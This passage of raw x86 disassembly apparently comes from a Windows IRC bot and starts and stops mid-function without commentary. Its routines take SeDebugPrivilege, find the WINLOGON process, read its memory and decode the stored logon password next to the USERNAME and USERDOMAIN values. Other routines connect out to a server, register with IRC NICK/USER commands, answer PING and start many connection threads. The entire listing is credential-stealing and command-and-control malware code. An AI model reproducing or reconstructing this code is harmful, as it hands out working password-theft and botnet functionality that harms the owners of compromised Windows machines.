esp, 2Ch mov [ebp+arg_14], eax loc_416E72: ; CODE XREF: sub_416DC9+53j ; sub_416DC9+65j ... lea eax, [ebp+var_144] push eax push [ebp+var_4] call dword_427118 ; FindNextFileA test eax, eax jnz short loc_416E15 loc_416E86: ; CODE XREF: sub_416DC9+4Aj push [ebp+var_4] call dword_42710C ; FindClose push [ebp+arg_C] lea eax, [ebp+var_248] push [ebp+arg_10] push ebx push esi push eax call sub_41B980 add esp, 14h lea eax, [ebp+var_144] push eax lea eax, [ebp+var_248] push eax call edi ; FindFirstFileA mov esi, eax cmp esi, 0FFFFFFFFh jz short loc_416F0C loc_416EBD: ; CODE XREF: sub_416DC9+141j lea eax, [ebp+var_118] inc [ebp+arg_14] push eax lea eax, [ebp+var_54C] push [ebp+arg_10] push offset dword_438004 push 200h push eax call sub_41B980 push 1 lea eax, [ebp+var_54C] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 28h lea eax, [ebp+var_144] push eax push esi call dword_427118 ; FindNextFileA test eax, eax jnz short loc_416EBD loc_416F0C: ; CODE XREF: sub_416DC9+F2j push esi call dword_42710C ; FindClose mov eax, [ebp+arg_14] pop edi pop esi pop ebx leave retn sub_416DC9 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_416F1B proc near ; DATA XREF: sub_401ACD+1CD0o var_29C = byte ptr -29Ch var_9C = dword ptr -9Ch var_98 = byte ptr -98h var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 29Ch mov eax, [ebp+arg_0] push esi push edi push 25h pop ecx mov esi, eax lea edi, [ebp+var_9C] push 1 rep movsd pop esi mov [eax+90h], esi call sub_41A8F5 cmp eax, esi mov [ebp+var_4], eax jz short loc_416F5A cmp eax, 2 jz short loc_416F5A push offset unk_4381F8 jmp loc_417099 ; --------------------------------------------------------------------------- loc_416F5A: ; CODE XREF: sub_416F1B+2Ej ; sub_416F1B+33j push esi push offset aSedebugprivile ; "SeDebugPrivilege" call sub_419652 pop ecx test eax, eax pop ecx jz loc_417094 push ebx push offset aNtdll_dll ; "NTDLL.DLL" call dword_4270B8 ; LoadLibraryA mov esi, dword_4270BC mov edi, eax push offset aNtquerysystemi ; "NtQuerySystemInformation" push edi mov [ebp+var_8], edi call esi ; GetProcAddress push offset aRtlcreatequery ; "RtlCreateQueryDebugBuffer" push edi mov ds:dword_4D44CC, eax call esi ; GetProcAddress push offset aRtlqueryproces ; "RtlQueryProcessDebugInformation" push edi mov ds:dword_4D44C0, eax call esi ; GetProcAddress push offset aRtldestroyquer ; "RtlDestroyQueryDebugBuffer" push edi mov ds:dword_4D46D0, eax call esi ; GetProcAddress push offset aRtlrundecodeun ; "RtlRunDecodeUnicodeString" push edi mov ds:dword_4D44C8, eax call esi ; GetProcAddress mov ds:dword_4D44C4, eax call sub_4170ED test eax, eax mov [ebp+arg_0], eax jz loc_417067 mov esi, dword_42713C mov edi, 400h mov ebx, offset dword_4D34C0 push edi push ebx push offset aUsername ; "USERNAME" call esi ; GetEnvironmentVariableW push edi mov edi, offset dword_4D3CC0 push edi push offset aUserdomain ; "USERDOMAIN" call esi ; GetEnvironmentVariableW cmp [ebp+var_4], 1 push offset dword_4D46D8 push [ebp+arg_0] jnz short loc_417013 call sub_417276 jmp short loc_417018 ; --------------------------------------------------------------------------- loc_417013: ; CODE XREF: sub_416F1B+EFj call sub_41741D loc_417018: ; CODE XREF: sub_416F1B+F6j pop ecx test eax, eax pop ecx jz short loc_417060 cmp ds:dword_4D46D8, 0 jnz short loc_417047 push ebx push edi push [ebp+arg_0] lea eax, [ebp+var_29C] push offset unk_4380C0 push 200h push eax call sub_41B980 add esp, 18h jmp short loc_41707A ; --------------------------------------------------------------------------- loc_417047: ; CODE XREF: sub_416F1B+10Aj cmp [ebp+var_4], 1 push [ebp+arg_0] jnz short loc_417057 call sub_417553 jmp short loc_41705C ; --------------------------------------------------------------------------- loc_417057: ; CODE XREF: sub_416F1B+133j call sub_4175EA loc_41705C: ; CODE XREF: sub_416F1B+13Aj pop ecx push eax jmp short loc_41706C ; --------------------------------------------------------------------------- loc_417060: ; CODE XREF: sub_416F1B+101j push offset unk_438088 jmp short loc_41706C ; --------------------------------------------------------------------------- loc_417067: ; CODE XREF: sub_416F1B+B6j push offset unk_43805C loc_41706C: ; CODE XREF: sub_416F1B+143j ; sub_416F1B+14Aj lea eax, [ebp+var_29C] push eax call sub_41B886 pop ecx pop ecx loc_41707A: ; CODE XREF: sub_416F1B+12Aj push 0 push offset aSedebugprivile ; "SeDebugPrivilege" call sub_419652 pop ecx pop ecx push [ebp+var_8] call dword_427138 ; FreeLibrary pop ebx jmp short loc_4170A7 ; --------------------------------------------------------------------------- loc_417094: ; CODE XREF: sub_416F1B+4Ej push offset unk_438028 loc_417099: ; CODE XREF: sub_416F1B+3Aj lea eax, [ebp+var_29C] push eax call sub_41B886 pop ecx pop ecx loc_4170A7: ; CODE XREF: sub_416F1B+177j xor esi, esi cmp [ebp+var_10], esi jnz short loc_4170CE push esi lea eax, [ebp+var_29C] push [ebp+var_14] push eax lea eax, [ebp+var_98] push eax push [ebp+var_9C] call sub_409A73 add esp, 14h loc_4170CE: ; CODE XREF: sub_416F1B+191j lea eax, [ebp+var_29C] push eax call sub_4151AD push [ebp+var_18] call sub_40B413 pop ecx pop ecx push esi call dword_4270CC ; ExitThread pop edi pop esi sub_416F1B endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_4170ED proc near ; CODE XREF: sub_416F1B+ACp var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 sub esp, 18h and [esp+18h+var_4], 0 and [esp+18h+var_14], 0 push ebx push ebp push esi mov esi, dword_427148 mov ebx, 100h push edi push ebx push 8 call esi ; GetProcessHeap mov edi, dword_427144 push eax call edi ; RtlAllocateHeap mov ebp, eax lea eax, [esp+28h+var_14] push eax push ebx push ebp push 10h call ds:dword_4D44CC push ebp push 0 call esi ; GetProcessHeap push eax call dword_427140 ; RtlFreeHeap push [esp+28h+var_14] push 8 call esi ; GetProcessHeap push eax call edi ; RtlAllocateHeap mov ebp, eax mov eax, [esp+28h+var_14] lea ecx, [esp+28h+var_C] mov [esp+28h+var_C], eax push ecx push eax push ebp push 10h call ds:dword_4D44CC test eax, eax jnz short loc_4171DA mov eax, [esp+28h+var_C] shr eax, 4 mov [esp+28h+var_10], eax jz short loc_4171DA push 1 mov ebx, ebp pop ecx cmp eax, ecx mov [esp+28h+var_18], ecx jb short loc_4171DA loc_417176: ; CODE XREF: sub_4170ED+EBj cmp word ptr [ebx+8], 5 jnz short loc_4171CD push 0 push 0 call ds:dword_4D44C0 mov edi, eax push edi push 1 push dword ptr [ebx+4] call ds:dword_4D46D0 test eax, eax jnz short loc_4171BE mov eax, [edi+60h] push offset aWinlogon ; "WINLOGON" mov [esp+2Ch+var_8], eax lea eax, [edi+80h] push eax call sub_41D5AA pop ecx push eax call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_4171F2 loc_4171BE: ; CODE XREF: sub_4170ED+AAj test edi, edi jz short loc_4171C9 push edi call ds:dword_4D44C8 loc_4171C9: ; CODE XREF: sub_4170ED+D3j mov eax, [esp+28h+var_10] loc_4171CD: ; CODE XREF: sub_4170ED+8Ej add ebx, 10h inc [esp+28h+var_18] cmp [esp+28h+var_18], eax jbe short loc_417176 loc_4171DA: ; CODE XREF: sub_4170ED+6Dj ; sub_4170ED+7Aj ... xor edi, edi loc_4171DC: ; CODE XREF: sub_4170ED+17Dj push ebp push 0 call esi ; GetProcessHeap push eax call dword_427140 ; RtlFreeHeap mov eax, edi loc_4171EA: ; CODE XREF: sub_4170ED+184j pop edi pop esi pop ebp pop ebx add esp, 18h retn ; --------------------------------------------------------------------------- loc_4171F2: ; CODE XREF: sub_4170ED+CFj and [esp+28h+var_10], 0 cmp [esp+28h+var_8], 0 jbe short loc_41725B lea eax, [edi+80h] mov [esp+28h+var_18], eax loc_417208: ; CODE XREF: sub_4170ED+16Cj add [esp+28h+var_18], 11Ch push offset aNwgina ; "NWGINA" push [esp+2Ch+var_18] call sub_41D5AA pop ecx push eax call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_41726F push offset aMsgina ; "MSGINA" push [esp+2Ch+var_18] call sub_41D5AA pop ecx push eax call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_41724D mov eax, [ebx+4] mov [esp+28h+var_4], eax loc_41724D: ; CODE XREF: sub_4170ED+157j inc [esp+28h+var_10] mov eax, [esp+28h+var_10] cmp eax, [esp+28h+var_8] jb short loc_417208 loc_41725B: ; CODE XREF: sub_4170ED+10Fj test edi, edi jz short loc_417266 push edi call ds:dword_4D44C8 loc_417266: ; CODE XREF: sub_4170ED+170j mov edi, [esp+28h+var_4] jmp loc_4171DC ; --------------------------------------------------------------------------- loc_41726F: ; CODE XREF: sub_4170ED+13Cj xor eax, eax jmp loc_4171EA sub_4170ED endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_417276 proc near ; CODE XREF: sub_416F1B+F1p var_64 = byte ptr -64h var_60 = dword ptr -60h var_40 = byte ptr -40h var_34 = dword ptr -34h var_30 = dword ptr -30h var_2B = byte ptr -2Bh var_24 = byte ptr -24h var_14 = byte ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 64h push esi xor esi, esi push [ebp+arg_0] mov [ebp+var_10], esi push esi push 410h call dword_427084 ; OpenProcess cmp eax, esi mov [ebp+var_4], eax jnz short loc_41729F xor eax, eax jmp loc_41741A ; --------------------------------------------------------------------------- loc_41729F: ; CODE XREF: sub_417276+20j mov eax, [ebp+arg_4] push ebx push edi mov [eax], esi lea eax, [ebp+var_64] push eax call dword_427154 ; GetSystemInfo push [ebp+var_60] mov [ebp+var_8], esi mov esi, dword_427148 push 8 call esi ; GetProcessHeap mov edi, dword_427144 push eax call edi ; RtlAllocateHeap lea ecx, [ebp+var_8] mov ebx, dword_427150 push ecx mov [ebp+arg_0], eax push [ebp+var_60] push eax push 7FFDF000h push [ebp+var_4] call ebx ; ReadProcessMemory test eax, eax jnz short loc_4172EF xor esi, esi jmp loc_41740D ; --------------------------------------------------------------------------- loc_4172EF: ; CODE XREF: sub_417276+70j lea eax, [ebp+var_40] push 1Ch push eax mov eax, [ebp+arg_0] push dword ptr [eax+18h] push [ebp+var_4] call dword_42714C ; VirtualQueryEx test eax, eax jz loc_4173FC mov ecx, [ebp+var_30] mov eax, 1000h and ecx, eax cmp ecx, eax jnz loc_4173FC test [ebp+var_2B], 1 jnz loc_4173FC push [ebp+var_34] push 8 call esi ; GetProcessHeap push eax call edi ; RtlAllocateHeap mov edi, eax lea eax, [ebp+var_8] push eax mov eax, [ebp+arg_0] push [ebp+var_34] mov [ebp+var_C], edi push edi push dword ptr [eax+18h] push [ebp+var_4] call ebx ; ReadProcessMemory test eax, eax jz loc_4173FC loc_417352: ; CODE XREF: sub_417276+112j push edi push offset dword_4D34C0 call sub_426762 pop ecx test eax, eax pop ecx jnz short loc_41737A lea eax, [edi+200h] push eax push offset dword_4D3CC0 call sub_426762 pop ecx test eax, eax pop ecx jz short loc_41738A loc_41737A: ; CODE XREF: sub_417276+EBj mov eax, [ebp+var_34] mov ecx, [ebp+var_C] inc edi add eax, ecx inc edi cmp edi, eax jnb short loc_4173FC jmp short loc_417352 ; --------------------------------------------------------------------------- loc_41738A: ; CODE XREF: sub_417276+102j test edi, edi jz short loc_4173FC lea eax, [ebp+var_14] push eax lea eax, [edi+410h] push eax call dword_427114 ; FileTimeToLocalFileTime test eax, eax jz short loc_4173C5 lea eax, [ebp+var_24] push eax lea eax, [ebp+var_14] push eax call dword_427110 ; FileTimeToSystemTime test eax, eax jz short loc_4173C5 mov al, [edi+42Ch] mov ecx, [ebp+arg_4] shr eax, 1 and eax, 7Fh mov [ecx], eax loc_4173C5: ; CODE XREF: sub_417276+12Bj ; sub_417276+13Dj movzx eax, word ptr [edi+42Ch] shr eax, 8 mov ds:dword_4D46E4, eax mov eax, [ebp+arg_0] mov [ebp+var_10], 1 mov eax, [eax+18h] sub eax, [ebp+var_C] lea eax, [eax+edi+434h] add edi, 434h mov ds:dword_4D46DC, eax mov ds:dword_4D46E0, edi loc_4173FC: ; CODE XREF: sub_417276+90j ; sub_417276+A2j ... push [ebp+arg_0] push 0 call esi ; GetProcessHeap push eax call dword_427140 ; RtlFreeHeap mov esi, [ebp+var_10] loc_41740D: ; CODE XREF: sub_417276+74j push [ebp+var_4] call dword_427068 ; CloseHandle pop edi mov eax, esi pop ebx loc_41741A: ; CODE XREF: sub_417276+24j pop esi leave retn sub_417276 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41741D proc near ; CODE XREF: sub_416F1B:loc_417013p var_4C = byte ptr -4Ch var_48 = dword ptr -48h var_44 = dword ptr -44h var_40 = dword ptr -40h var_28 = byte ptr -28h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_13 = byte ptr -13h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 4Ch push ebx push esi push edi push [ebp+arg_0] push 0 push 410h call dword_427084 ; OpenProcess test eax, eax mov [ebp+arg_0], eax jz loc_41750F mov eax, [ebp+arg_4] and dword ptr [eax], 0 lea eax, [ebp+var_4C] push eax call dword_427154 ; GetSystemInfo mov ebx, [ebp+var_44] mov eax, [ebp+var_40] cmp ebx, eax mov [ebp+var_C], eax jnb loc_417506 mov edi, dword_427148 loc_417468: ; CODE XREF: sub_41741D+E3j lea eax, [ebp+var_28] push 1Ch push eax push ebx push [ebp+arg_0] call dword_42714C ; VirtualQueryEx test eax, eax jz short loc_4174F4 mov edx, [ebp+var_18] mov ecx, [ebp+var_1C] mov eax, 1000h mov [ebp+var_4], ecx and edx, eax cmp edx, eax jnz short loc_4174FA test [ebp+var_13], 1 jnz short loc_4174FA push ecx push 8 call edi ; GetProcessHeap push eax call dword_427144 ; RtlAllocateHeap mov esi, eax lea eax, [ebp+var_8] push eax and [ebp+var_8], 0 push [ebp+var_1C] push esi push ebx push [ebp+arg_0] call dword_427150 ; ReadProcessMemory test eax, eax jz short loc_4174E6 push offset dword_4D34C0 push esi call sub_426762 pop ecx test eax, eax pop ecx jnz short loc_4174E6 lea eax, [esi+400h] push offset dword_4D3CC0 push eax call sub_426762 pop ecx test eax, eax pop ecx jz short loc_417516 loc_4174E6: ; CODE XREF: sub_41741D+9Fj ; sub_41741D+B0j push esi push 0 call edi ; GetProcessHeap push eax call dword_427140 ; RtlFreeHeap jmp short loc_4174FA ; --------------------------------------------------------------------------- loc_4174F4: ; CODE XREF: sub_41741D+5Dj mov eax, [ebp+var_48] mov [ebp+var_4], eax loc_4174FA: ; CODE XREF: sub_41741D+71j ; sub_41741D+77j ... add ebx, [ebp+var_4] cmp ebx, [ebp+var_C] jb loc_417468 loc_417506: ; CODE XREF: sub_41741D+3Fj push [ebp+arg_0] call dword_427068 ; CloseHandle loc_41750F: ; CODE XREF: sub_41741D+1Ej xor eax, eax loc_417511: ; CODE XREF: sub_41741D+134j pop edi pop esi pop ebx leave retn ; --------------------------------------------------------------------------- loc_417516: ; CODE XREF: sub_41741D+C7j add ebx, 800h lea eax, [esi+800h] xor ecx, ecx mov ds:dword_4D46DC, ebx mov ds:dword_4D46E0, eax cmp [eax], cl jnz short loc_417538 cmp [eax+1], cl jz short loc_417540 loc_417538: ; CODE XREF: sub_41741D+114j ; sub_41741D+121j inc ecx inc eax inc eax cmp byte ptr [eax], 0 jnz short loc_417538 loc_417540: ; CODE XREF: sub_41741D+119j mov eax, [ebp+arg_4] push [ebp+arg_0] mov [eax], ecx call dword_427068 ; CloseHandle push 1 pop eax jmp short loc_417511 sub_41741D endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_417553 proc near ; CODE XREF: sub_416F1B+135p var_8 = word ptr -8 var_6 = word ptr -6 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push ecx push ecx mov eax, ds:dword_4D46D8 push esi mov esi, dword_427148 push edi lea ecx, [eax+eax] lea eax, [eax+eax+2] mov [ebp+var_6], ax mov [ebp+var_8], cx movzx eax, ax push eax push 8 call esi ; GetProcessHeap push eax call dword_427144 ; RtlAllocateHeap mov ecx, ds:dword_4D46D8 mov [ebp+var_4], eax add ecx, ecx push ecx push ds:dword_4D46E0 push eax call sub_41C310 add esp, 0Ch lea eax, [ebp+var_8] push eax mov al, byte ptr ds:dword_4D46E4 push eax call ds:dword_4D44C4 push [ebp+var_4] mov edi, offset dword_4D44D0 push offset dword_4D34C0 push offset dword_4D3CC0 push [ebp+arg_0] push offset dword_438244 push 200h push edi call sub_41B980 add esp, 1Ch push [ebp+var_4] push 0 call esi ; GetProcessHeap push eax call dword_427140 ; RtlFreeHeap mov eax, edi pop edi pop esi leave retn sub_417553 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4175EA proc near ; CODE XREF: sub_416F1B:loc_417057p var_18 = word ptr -18h var_16 = word ptr -16h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_1 = byte ptr -1 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 18h mov eax, ds:dword_4D46D8 push ebx push esi push edi lea ecx, [eax+eax] lea eax, [eax+eax+2] mov [ebp+var_16], ax mov [ebp+var_18], cx movzx eax, ax push eax push 8 call dword_427148 ; GetProcessHeap push eax call dword_427144 ; RtlAllocateHeap and [ebp+var_C], 0 mov [ebp+var_14], eax mov ebx, offset dword_4D3CC0 mov edi, 200h mov esi, offset dword_4D32C0 loc_417630: ; CODE XREF: sub_4175EA+FAj mov eax, ds:dword_4D46D8 add eax, eax push eax push ds:dword_4D46E0 push [ebp+var_14] call sub_41C310 add esp, 0Ch lea eax, [ebp+var_18] push eax push [ebp+var_C] call ds:dword_4D44C4 mov eax, ds:dword_4D46D8 and [ebp+var_10], 0 mov ecx, [ebp+var_14] mov [ebp+var_8], 1 test eax, eax jbe short loc_4176A5 loc_41766D: ; CODE XREF: sub_4175EA+B3j cmp [ebp+var_8], 0 jz short loc_4176C2 mov dl, [ecx] test dl, dl mov [ebp+var_1], dl jz short loc_417691 cmp byte ptr [ecx+1], 0 jnz short loc_417691 cmp dl, 20h jnb short loc_41768B and [ebp+var_8], 0 loc_41768B: ; CODE XREF: sub_4175EA+9Bj cmp [ebp+var_1], 7Eh jbe short loc_417695 loc_417691: ; CODE XREF: sub_4175EA+90j ; sub_4175EA+96j and [ebp+var_8], 0 loc_417695: ; CODE XREF: sub_4175EA+A5j inc ecx inc ecx inc [ebp+var_10] cmp [ebp+var_10], eax jb short loc_41766D cmp [ebp+var_8], 0 jz short loc_4176C2 loc_4176A5: ; CODE XREF: sub_4175EA+81j push [ebp+var_14] push offset dword_4D34C0 push ebx push [ebp+arg_0] push offset dword_438244 push edi push esi call sub_41B980 add esp, 1Ch jmp short loc_4176DA ; --------------------------------------------------------------------------- loc_4176C2: ; CODE XREF: sub_4175EA+87j ; sub_4175EA+B9j push offset dword_4D34C0 push ebx push [ebp+arg_0] push offset dword_438294 push edi push esi call sub_41B980 add esp, 18h loc_4176DA: ; CODE XREF: sub_4175EA+D6j inc [ebp+var_C] cmp [ebp+var_C], 0FFh jbe loc_417630 push [ebp+var_14] push 0 call dword_427148 ; GetProcessHeap push eax call dword_427140 ; RtlFreeHeap mov eax, esi pop edi pop esi pop ebx leave retn sub_4175EA endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_417703 proc near ; CODE XREF: sub_4178BB+2Fp var_10 = word ptr -10h var_E = word ptr -0Eh var_C = dword ptr -0Ch arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 10h push esi push edi push 0 push 1 push 2 call ds:dword_4CB6D4 ; socket mov edi, eax or esi, 0FFFFFFFFh cmp edi, esi jz short loc_41777F push 10h lea eax, [ebp+var_10] push 0 push eax call sub_41B590 add esp, 0Ch mov [ebp+var_10], 2 push [ebp+arg_4] call ds:dword_4CB654 ; htons push [ebp+arg_0] mov [ebp+var_E], ax call ds:dword_4CB694 ; inet_addr cmp eax, esi jnz short loc_417764 push [ebp+arg_0] call ds:dword_4CB6D8 ; gethostbyname test eax, eax jz short loc_41777F mov eax, [eax+0Ch] mov eax, [eax] mov eax, [eax] loc_417764: ; CODE XREF: sub_417703+4Bj mov [ebp+var_C], eax lea eax, [ebp+var_10] push 10h push eax push edi call ds:dword_4CB5FC ; connect cmp eax, esi jnz short loc_417783 push edi call ds:dword_4CB6EC ; closesocket loc_41777F: ; CODE XREF: sub_417703+1Bj ; sub_417703+58j mov eax, esi jmp short loc_417785 ; --------------------------------------------------------------------------- loc_417783: ; CODE XREF: sub_417703+73j mov eax, edi loc_417785: ; CODE XREF: sub_417703+7Ej pop edi pop esi leave retn sub_417703 endp ; =============== S U B R O U T I N E ======================================= sub_417789 proc near ; CODE XREF: sub_401ACD+3295p ; sub_401ACD+3301p ... arg_0 = dword ptr 4 push esi push edi mov edi, [esp+8+arg_0] push offset asc_42A0A4 ; "\n" push edi call sub_41BEC0 pop ecx mov esi, offset dword_4D46EC pop ecx loc_4177A1: ; CODE XREF: sub_417789+42j cmp dword ptr [esi-4], 1 jnz short loc_4177BF cmp dword ptr [esi], 0 jbe short loc_4177BF push 0 push edi call sub_41AFE0 pop ecx push eax push edi push dword ptr [esi] call ds:dword_4CB6A4 ; send loc_4177BF: ; CODE XREF: sub_417789+1Cj ; sub_417789+21j add esi, 210h cmp esi, offset dword_4DAE0C jl short loc_4177A1 pop edi pop esi retn sub_417789 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4177D0 proc near ; CODE XREF: sub_4178BB+155p var_420 = byte ptr -420h var_220 = byte ptr -220h var_20 = dword ptr -20h var_1C = dword ptr -1Ch arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 420h push ebx push esi mov esi, offset asc_42D128 ; " " push edi push esi push [ebp+arg_0] call sub_41C0F4 pop ecx mov [ebp+var_20], eax pop ecx lea edi, [ebp+var_1C] push 7 pop ebx loc_4177F5: ; CODE XREF: sub_4177D0+35j push esi push 0 call sub_41C0F4 mov [edi], eax pop ecx add edi, 4 dec ebx pop ecx jnz short loc_4177F5 mov esi, [ebp+var_1C] xor edi, edi cmp [ebp+var_20], edi jnz short loc_41781D cmp esi, edi jnz short loc_41781D push 1 pop eax jmp loc_4178B6 ; --------------------------------------------------------------------------- loc_41781D: ; CODE XREF: sub_4177D0+3Fj ; sub_4177D0+43j push [ebp+var_20] push offset aPing ; "PING" call sub_41C070 pop ecx pop ecx test eax, eax push esi jnz short loc_417838 push offset dword_438EA4 jmp short loc_417886 ; --------------------------------------------------------------------------- loc_417838: ; CODE XREF: sub_4177D0+5Fj push offset a433 ; "433" call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_417859 push esi push offset dword_438EA0 call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_4178B4 loc_417859: ; CODE XREF: sub_4177D0+76j push 200h lea eax, [ebp+var_420] push edi push eax call sub_41B590 lea eax, [ebp+var_420] push eax call sub_417ADE add esp, 10h lea eax, [ebp+var_420] push eax push offset dword_438E94 loc_417886: ; CODE XREF: sub_4177D0+66j lea eax, [ebp+var_220] push eax call sub_41B886 add esp, 0Ch lea eax, [ebp+var_220] push edi push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_220] push eax push [ebp+arg_4] call ds:dword_4CB6A4 ; send loc_4178B4: ; CODE XREF: sub_4177D0+87j xor eax, eax loc_4178B6: ; CODE XREF: sub_4177D0+48j pop edi pop esi pop ebx leave retn sub_4177D0 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4178BB proc near ; DATA XREF: sub_417A60+61o var_4008 = byte ptr -4008h var_3008 = byte ptr -3008h var_2008 = byte ptr -2008h var_1008 = byte ptr -1008h var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, 4008h call sub_41BB20 push ebx push esi mov esi, [ebp+arg_0] push edi imul esi, 210h push 1 pop edi lea eax, dword_4D46F4[esi] mov ds:dword_4D46E8[esi], edi push ds:dword_4D48F4[esi] push eax call sub_417703 pop ecx xor ebx, ebx cmp eax, edi pop ecx mov ds:dword_4D46EC[esi], eax jb loc_417A40 mov edi, 1000h lea eax, [ebp+var_2008] push edi push ebx push eax call sub_41B590 lea eax, [ebp+var_2008] push eax call sub_417ADE lea eax, [ebp+var_4008] push eax call sub_417ADE lea eax, [ebp+var_3008] push eax call sub_417ADE add esp, 18h lea eax, [ebp+var_3008] push eax lea eax, [ebp+var_4008] push eax lea eax, [ebp+var_2008] push eax lea eax, [ebp+var_1008] push offset aNickSUserSHotm ; "NICK %s\nUSER %s \"hotmail.com\" \"127.0.0."... push eax call sub_41B886 add esp, 14h lea eax, [ebp+var_1008] push ebx push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_1008] push eax push ds:dword_4D46EC[esi] call ds:dword_4CB6A4 ; send push edi lea eax, [ebp+var_1008] push ebx push eax call sub_41B590 add esp, 0Ch loc_417997: ; CODE XREF: sub_4178BB+111j ; sub_4178BB+180j push edi lea eax, [ebp+var_1008] push ebx push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_1008] push ebx push edi push eax push ds:dword_4D46EC[esi] call ds:dword_4CB66C ; recv cmp eax, ebx mov [ebp+var_8], eax jle short loc_417A40 xor eax, eax cmp [ebp+var_8], ebx mov [ebp+var_4], eax jz short loc_417997 loc_4179CE: ; CODE XREF: sub_4178BB+17Ej mov al, [ebp+eax+var_1008] cmp al, 0Dh jz short loc_4179F5 cmp al, 0Ah jz short loc_4179F5 cmp [ebp+arg_0], 0FA0h jz short loc_4179F5 mov ecx, [ebp+arg_0] inc [ebp+arg_0] mov [ebp+ecx+var_2008], al jmp short loc_417A2F ; --------------------------------------------------------------------------- loc_4179F5: ; CODE XREF: sub_4178BB+11Cj ; sub_4178BB+120j ... mov eax, [ebp+arg_0] cmp eax, ebx jz short loc_417A2F push ds:dword_4D46EC[esi] mov [ebp+eax+var_2008], bl lea eax, [ebp+var_2008] push eax call sub_4177D0 pop ecx test eax, eax pop ecx ja short loc_417A40 push edi lea eax, [ebp+var_2008] push ebx push eax call sub_41B590 add esp, 0Ch mov [ebp+arg_0], ebx loc_417A2F: ; CODE XREF: sub_4178BB+138j ; sub_4178BB+13Fj mov eax, [ebp+var_4] inc eax cmp eax, [ebp+var_8] mov [ebp+var_4], eax jnz short loc_4179CE jmp loc_417997 ; --------------------------------------------------------------------------- loc_417A40: ; CODE XREF: sub_4178BB+40j ; sub_4178BB+107j ... mov ds:dword_4D46E8[esi], ebx mov esi, ds:dword_4D46EC[esi] cmp esi, ebx jbe short loc_417A57 push esi call ds:dword_4CB6EC ; closesocket loc_417A57: ; CODE XREF: sub_4178BB+193j pop edi pop esi xor eax, eax pop ebx leave retn 4 sub_4178BB endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_417A60 proc near ; CODE XREF: sub_401ACD+31E2p var_8 = byte ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp push ecx push ecx push ebx xor ebx, ebx cmp [ebp+arg_8], ebx push esi push edi mov [ebp+var_4], ebx jle short loc_417AD9 loc_417A72: ; CODE XREF: sub_417A60+77j xor edi, edi mov eax, offset dword_4D46E8 loc_417A79: ; CODE XREF: sub_417A60+28j cmp [eax], ebx jz short loc_417A8A add eax, 210h inc edi cmp eax, offset dword_4DAE08 jl short loc_417A79 loc_417A8A: ; CODE XREF: sub_417A60+1Bj cmp edi, 31h jz short loc_417AD9 mov esi, edi push [ebp+arg_0] imul esi, 210h lea eax, dword_4D46F4[esi] push eax call sub_41BEB0 mov eax, [ebp+arg_4] pop ecx mov ds:dword_4D48F4[esi], eax pop ecx lea eax, [ebp+var_8] mov ds:dword_4D46E8[esi], 1 push eax push ebx push edi push offset sub_4178BB push ebx push ebx call dword_42707C ; CreateThread inc [ebp+var_4] mov eax, [ebp+var_4] cmp eax, [ebp+arg_8] jl short loc_417A72 loc_417AD9: ; CODE XREF: sub_417A60+10j ; sub_417A60+2Dj pop edi pop esi pop ebx leave retn sub_417A60 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_417ADE proc near ; CODE XREF: sub_401ACD+374Ep ; sub_401ACD+3794p ... var_40 = byte ptr -40h var_2D = byte ptr -2Dh var_2C = byte ptr -2Ch var_2B = byte ptr -2Bh var_18 = qword ptr -18h var_C = dword ptr -0Ch var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 40h push 14h lea eax, [ebp+var_2C] push 0 push eax call sub_41B590 add esp, 0Ch call sub_41B8E2 mov [ebp+var_C], eax fild [ebp+var_C] fmul dbl_4276F0 call sub_41C798 cmp eax, 1 jnz short loc_417B28 call sub_41B8E2 call sub_41B8E2 push 66h cdq pop ecx idiv ecx push off_4385E8[edx*4] jmp short loc_417B41 ; --------------------------------------------------------------------------- loc_417B28: ; CODE XREF: sub_417ADE+2Fj 